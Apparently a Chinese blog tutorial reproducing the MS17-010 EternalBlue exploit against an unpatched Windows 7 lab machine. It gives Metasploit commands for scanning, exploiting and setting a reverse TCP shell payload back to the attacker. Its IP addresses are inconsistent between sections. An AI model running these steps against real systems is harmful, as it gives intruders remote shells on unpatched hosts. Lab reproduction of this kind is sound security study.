天天看点

MS17-010 ——永恒之蓝漏洞利用

背景介绍

原理:“永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器,利用Windows系统的SMB漏洞可以获取系最高权限。

影响范围:Windows Vista、Win7、Win8、Win XP、Windows server 2003等。

防范措施:及时更新Windows系统补丁;不要轻易打开陌生的文件;关闭445、139端口。

环境:

攻击机:kali IP:192.168.137.44

靶机:win7 IP:192.168.137.190 (开放445端口且没有打补丁)

工具:MSF框架

漏洞复现:

nmap对靶机进行扫描

MS17-010 ——永恒之蓝漏洞利用

1. 在kali终端打开metasploit

msfconsole
           
MS17-010 ——永恒之蓝漏洞利用

2. 寻找永恒之蓝相关扫描模块

search ms17-010
           
MS17-010 ——永恒之蓝漏洞利用

3. 利用扫描模块扫描确定漏洞

  1. 利用smb_ms17_010漏洞扫描模块,利用它可以确定目标是否存在该漏洞。
use auxiliary/scanner/smb/smb_ms17_010
           
  1. 查看需要填充哪些参数
show options
           

RHOSTS参数是你即将扫描的网段,当然也可以只有一个主机IP

MS17-010 ——永恒之蓝漏洞利用
  1. 设置靶机IP地址
set rhosts 192.168.137.190
           
  1. 开始扫描
exploit 或 run  都表示开始执行
           

如果结果中前面有个绿色的加号,则说明可以利用该漏洞

MS17-010 ——永恒之蓝漏洞利用

4. 利用攻击模块攻击

  1. 选择攻击模块
use exploit/windows/smb/ms17_010_eternalblue
           
  1. 选择payload
set payload generic/shell_reverse_tcp
           
  1. 设置rhost(靶机IP)
set rhost 192.168.1.103
           
  1. 设置lhost(攻击机IP)
set lhost 192.168.1.105
           
  1. 设置监听端口(默认是4444)
set lport 500  
           
MS17-010 ——永恒之蓝漏洞利用

6) 开始攻击

exploit 或 run
           
MS17-010 ——永恒之蓝漏洞利用

5. 反弹shell

MS17-010 ——永恒之蓝漏洞利用

win7查看端口建立连接

netstat -an
           
MS17-010 ——永恒之蓝漏洞利用

继续阅读